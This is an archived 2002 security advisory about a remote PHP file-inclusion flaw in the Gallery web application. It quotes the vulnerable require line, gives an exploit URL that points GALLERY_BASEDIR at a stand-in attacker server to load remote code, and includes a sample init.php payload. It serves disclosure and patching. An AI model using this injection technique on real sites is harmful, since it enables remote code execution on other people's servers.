TUCoPS :: Web :: Apps :: web5592.htm

gallery PHP code injection
2nd Aug 2002 [SBWID-5592]
COMMAND

	gallery code injection

SYSTEMS AFFECTED

	?

PROBLEM

	Avart [http://bluephod.net/] says :
	

	There are several include statements that includes  a  variable  without
	checking it. A administrator of PowerTech (an ISP in Norway)  discovered
	this problems.
	

	You're  able  to  inject  foreign  code   into   the   application   (if
	allow_url_fopen is turned on).
	

	Example code:
	

	errors/configmode.php

	[...]

	<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>

	[...]

	

	# How can I exploit the code?
	

	Use this line:
	

	http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/

	

	On http://your.evil.server.tdl/ you place a file  called  init.php  that
	puts out nasty php-code. The file could look like this:
	

	init.php:

	<?php

	echo "<?php phpinfo(); ?>";

	?>

	

SOLUTION

	Check http://gallery.sf.net/ for updates
	

	Get gallery.1.3.1-cvs-b13.tar.gz

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH